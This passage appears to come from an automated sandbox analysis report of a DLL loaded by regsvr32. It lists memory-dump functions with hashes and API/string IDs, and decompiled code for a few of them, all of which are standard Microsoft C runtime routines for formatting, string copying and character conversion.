                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                                      • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 1328470723-1899493600
                                                      • Opcode ID: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                      • Instruction ID: 35246ecaaba514364cbfc4328619620b6524a9f29049ac5612c0b139108759f7
                                                      • Opcode Fuzzy Hash: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                      • Instruction Fuzzy Hash: 41C10D72A0CAC286E7B19B55E8407AFB7E0F384346F600125E6C987AE9DB7DE444CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2EFB0 Relevance: 16.7, APIs: 11, Instructions: 200memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                                      • String ID:
                                                      • API String ID: 2352934578-0
                                                      • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                      • Instruction ID: 07e98e5d3e74dc1edba9ed484819fff5a1f4d1c282268086727bfc73f0da1f11
                                                      • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                      • Instruction Fuzzy Hash: E8B1D73690C7818AE7A0CB5AE84476FB7E0F789754F214525EAC983BA8DB7ED444CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D33380 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 330COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                                      • API String ID: 2123368286-322314505
                                                      • Opcode ID: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                      • Instruction ID: 6d338823bc0f2b3e781b71aef6a49b7720da2244df946e2498ce1ac2f83d5b49
                                                      • Opcode Fuzzy Hash: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                      • Instruction Fuzzy Hash: BE023F32A0CB8585EBF09B29E94476EA3E0F385795F604625D6DD83BE5DF3ED0848B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3E424 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 307COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 1139040907-3988320827
                                                      • Opcode ID: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                      • Instruction ID: 3e7729e9fa2df8fbd66d26b0c41d9f273e3b14a95de5485bb8cc9613adf332ea
                                                      • Opcode Fuzzy Hash: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                      • Instruction Fuzzy Hash: 48F1E972A0CAC18AE7A08B55E8407AFB7E0F385746F600126E6CD87AA9DB7DD444CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D31640 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 233COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                                      • API String ID: 2123368286-3300880850
                                                      • Opcode ID: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                      • Instruction ID: aecfb8002ddf48ca923cbb39b51a8433fc62f52c2bad17b92f015e95501d1b82
                                                      • Opcode Fuzzy Hash: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                      • Instruction Fuzzy Hash: 16C15B31A0DB8685EBB08B29E84476E63E4F385795F608235D6DD43BA9DF7ED084CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2D490 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 228COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                                      • API String ID: 2123368286-3045918802
                                                      • Opcode ID: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                      • Instruction ID: 2d2c21a115c33e05293010ad7c3501076a31da08f4abba68164bfd8b1e70ad26
                                                      • Opcode Fuzzy Hash: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                      • Instruction Fuzzy Hash: 9EC14D3190CB8A85EBA08B28E84436EA3E0F386794F614535D6DE43BB5DF7ED448CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3F000 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 15%
                                                      			E000007FE7FEF9D3F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
				intOrPtr _v24;
				long long _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v88;
				intOrPtr _v96;
				long long _v104;
				void* _t80;
				void* _t81;
				void* _t89;
				void* _t92;
				intOrPtr _t102;
				intOrPtr* _t136;
				intOrPtr* _t137;
				intOrPtr* _t139;
				signed char* _t141;
				intOrPtr* _t142;
				intOrPtr* _t143;
				intOrPtr* _t144;
				intOrPtr* _t148;
				intOrPtr* _t149;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if (_a16 == 0) goto 0xf9d3f031;
				if (_a24 != 0) goto 0xf9d3f038;
				goto 0xf9d3f31a;
				_t136 = _a16;
				if ( *_t136 != 0) goto 0xf9d3f066;
				if (_a8 == 0) goto 0xf9d3f05f;
				 *_a8 = 0;
				goto 0xf9d3f31a;
				0xf9d266b0();
				_t80 = E000007FE7FEF9D26840(0,  &_v88);
				_t137 =  *_t136;
				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0xf9d3f0d2;
				_t81 = E000007FE7FEF9D26840(_t80,  &_v88);
				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0xf9d3f0d2;
				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
				_v104 = _t139;
				r9d = 0;
				r8d = 0x47;
				0xf9d2b3b0();
				if (_t81 != 1) goto 0xf9d3f0d2;
				asm("int3");
				E000007FE7FEF9D26840(0,  &_v88);
				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0xf9d3f121;
				if (_a8 == 0) goto 0xf9d3f106;
				_t141 = _a16;
				 *_a8 =  *_t141 & 0x000000ff;
				_v56 = 1;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				E000007FE7FEF9D26840(_v56,  &_v88);
				if (E000007FE7FEF9D32B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0xf9d3f276;
				_t89 = E000007FE7FEF9D26840(_t88,  &_v88);
				_t142 =  *_t141;
				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0xf9d3f1f3;
				E000007FE7FEF9D26840(_t89,  &_v88);
				_t143 =  *_t142;
				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0xf9d3f1f3;
				if (_a8 == 0) goto 0xf9d3f191;
				_v36 = 1;
				goto 0xf9d3f199;
				_v36 = 0;
				_t92 = E000007FE7FEF9D26840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
				_t144 =  *_t143;
				_v32 = _t144;
				E000007FE7FEF9D26840(_t92,  &_v88);
				_v96 = _v36;
				_v104 = _a8;
				r9d =  *((intOrPtr*)(_v32 + 0x10c));
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f247;
				E000007FE7FEF9D26840(_t94,  &_v88);
				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0xf9d3f221;
				_t148 = _a16;
				if ( *((char*)(_t148 + 1)) != 0) goto 0xf9d3f247;
				0xf9d2ab30();
				 *_t148 = 0x2a;
				_v52 = 0xffffffff;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				E000007FE7FEF9D26840(_v52,  &_v88);
				_t149 =  *_t148;
				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
				E000007FE7FEF9D26800( &_v88);
				_t102 = _v48;
				goto 0xf9d3f310;
				if (_a8 == 0) goto 0xf9d3f28b;
				_v24 = 1;
				goto 0xf9d3f293;
				_v24 = 0;
				E000007FE7FEF9D26840(_t102,  &_v88);
				_v96 = _v24;
				_v104 = _a8;
				r9d = 1;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f2f8;
				0xf9d2ab30();
				 *((intOrPtr*)( *_t149)) = 0x2a;
				_v44 = 0xffffffff;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				_v40 = 1;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				return E000007FE7FEF9D26800( &_v88);
			}




























                                                      0x7fef9d3f000
                                                      0x7fef9d3f005
                                                      0x7fef9d3f00a
                                                      0x7fef9d3f00f
                                                      0x7fef9d3f024
                                                      0x7fef9d3f02f
                                                      0x7fef9d3f033
                                                      0x7fef9d3f038
                                                      0x7fef9d3f045
                                                      0x7fef9d3f050
                                                      0x7fef9d3f05c
                                                      0x7fef9d3f061
                                                      0x7fef9d3f073
                                                      0x7fef9d3f07d
                                                      0x7fef9d3f082
                                                      0x7fef9d3f08c
                                                      0x7fef9d3f093
                                                      0x7fef9d3f0a2
                                                      0x7fef9d3f0a4
                                                      0x7fef9d3f0ab
                                                      0x7fef9d3f0b0
                                                      0x7fef9d3f0b3
                                                      0x7fef9d3f0c5
                                                      0x7fef9d3f0cd
                                                      0x7fef9d3f0cf
                                                      0x7fef9d3f0d7
                                                      0x7fef9d3f0e3
                                                      0x7fef9d3f0ee
                                                      0x7fef9d3f0f0
                                                      0x7fef9d3f103
                                                      0x7fef9d3f106
                                                      0x7fef9d3f113
                                                      0x7fef9d3f11c
                                                      0x7fef9d3f126
                                                      0x7fef9d3f140
                                                      0x7fef9d3f14b
                                                      0x7fef9d3f150
                                                      0x7fef9d3f15a
                                                      0x7fef9d3f165
                                                      0x7fef9d3f16a
                                                      0x7fef9d3f17a
                                                      0x7fef9d3f185
                                                      0x7fef9d3f187
                                                      0x7fef9d3f18f
                                                      0x7fef9d3f191
                                                      0x7fef9d3f19e
                                                      0x7fef9d3f1a3
                                                      0x7fef9d3f1a6
                                                      0x7fef9d3f1b0
                                                      0x7fef9d3f1bc
                                                      0x7fef9d3f1c8
                                                      0x7fef9d3f1d2
                                                      0x7fef9d3f1f1
                                                      0x7fef9d3f1f8
                                                      0x7fef9d3f20f
                                                      0x7fef9d3f211
                                                      0x7fef9d3f21f
                                                      0x7fef9d3f221
                                                      0x7fef9d3f226
                                                      0x7fef9d3f22c
                                                      0x7fef9d3f239
                                                      0x7fef9d3f242
                                                      0x7fef9d3f24c
                                                      0x7fef9d3f251
                                                      0x7fef9d3f25a
                                                      0x7fef9d3f263
                                                      0x7fef9d3f268
                                                      0x7fef9d3f271
                                                      0x7fef9d3f27f
                                                      0x7fef9d3f281
                                                      0x7fef9d3f289
                                                      0x7fef9d3f28b
                                                      0x7fef9d3f298
                                                      0x7fef9d3f2a4
                                                      0x7fef9d3f2b0
                                                      0x7fef9d3f2b5
                                                      0x7fef9d3f2d3
                                                      0x7fef9d3f2d5
                                                      0x7fef9d3f2da
                                                      0x7fef9d3f2e0
                                                      0x7fef9d3f2ed
                                                      0x7fef9d3f2f6
                                                      0x7fef9d3f2f8
                                                      0x7fef9d3f305
                                                      0x7fef9d3f30e
                                                      0x7fef9d3f321

                                                      APIs
                                                      Strings
                                                      • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 000007FEF9D3F0B9
                                                      • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 000007FEF9D3F0A4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                                      • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                                      • API String ID: 3162172745-1617866167
                                                      • Opcode ID: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                      • Instruction ID: 684ba7971de88d1067c150b2dc8aa1ec623b130c6e00156a0851ae80eca3a1f6
                                                      • Opcode Fuzzy Hash: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                      • Instruction Fuzzy Hash: A9913C32A1C78586E7A0DB19E8507AEB7E0F785B45FA08136E6CD837A5DB3ED444CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D26BF0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 127COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                                      • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                      • API String ID: 792801276-1329727594
                                                      • Opcode ID: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                      • Instruction ID: 74944a5c68176a92a31906070f765b18f74d9586b7891cebb3d67554b9ce35f5
                                                      • Opcode Fuzzy Hash: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                      • Instruction Fuzzy Hash: B2613872A0D7C186E7B49B10E8907AEBBA0F784740FA18126D6CD47BA9DB3ED404CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3F900 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 105COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __doserrno$_invalid_parameter
                                                      • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                                      • API String ID: 747159061-3177431134
                                                      • Opcode ID: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                      • Instruction ID: efe890aaf17933dee885bd0091a5358479214bdc632742ad2579ba78141b5705
                                                      • Opcode Fuzzy Hash: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                      • Instruction Fuzzy Hash: 25518C32A1864A86F7909B59E88076EB3E1F3807A5F609321E1ED077F5D7BED500CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D2BA60 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                                      • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                                      • API String ID: 1608253119-1427866139
                                                      • Opcode ID: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                      • Instruction ID: af7a509f9d9663d3d091774dda128b819ecaca6506a1d0d194354ddf51f74ba4
                                                      • Opcode Fuzzy Hash: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                      • Instruction Fuzzy Hash: 0F41573191DB4686E7A09B20F84436E72E0F786780F614135E6CD43AF8CBBEE485CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D386B0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 282COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                                      • API String ID: 2123368286-2958264153
                                                      • Opcode ID: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                      • Instruction ID: 82e3240dde4e8d48ae566a9cb8a6505450234aa7e72eaba3f84792f0d3cada8d
                                                      • Opcode Fuzzy Hash: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                      • Instruction Fuzzy Hash: 3CE14D31A1DA868AEBB48B24E84076EB3E0F385765F204225E6DD43BE5DB7ED445CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3C1A3 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 251COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 1967237116-569934968
                                                      • Opcode ID: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                      • Instruction ID: 28cad1f176e9be3240a3a6eae7be917d28bff7715537f6893ff636485155e31a
                                                      • Opcode Fuzzy Hash: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                      • Instruction Fuzzy Hash: 4AD11D7260DBC58BE7B1CB65E8507AEB7E4F384785F200125EAC886AA9DB7DD540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3BFDE Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 212COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E000007FE7FEF9D3BFDE(char _a696, char _a976) {

				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}



                                                      0x7fef9d3bfe6
                                                      0x7fef9d3bff7
                                                      0x7fef9d3c006
                                                      0x7fef9d3c02d

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: wctomb_s
                                                      • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2215178078-1895985292
                                                      • Opcode ID: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                      • Instruction ID: 997c34190204a200d34649c4b27f82da9c53e16be2ae3c50a0a3632b50fb2b35
                                                      • Opcode Fuzzy Hash: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
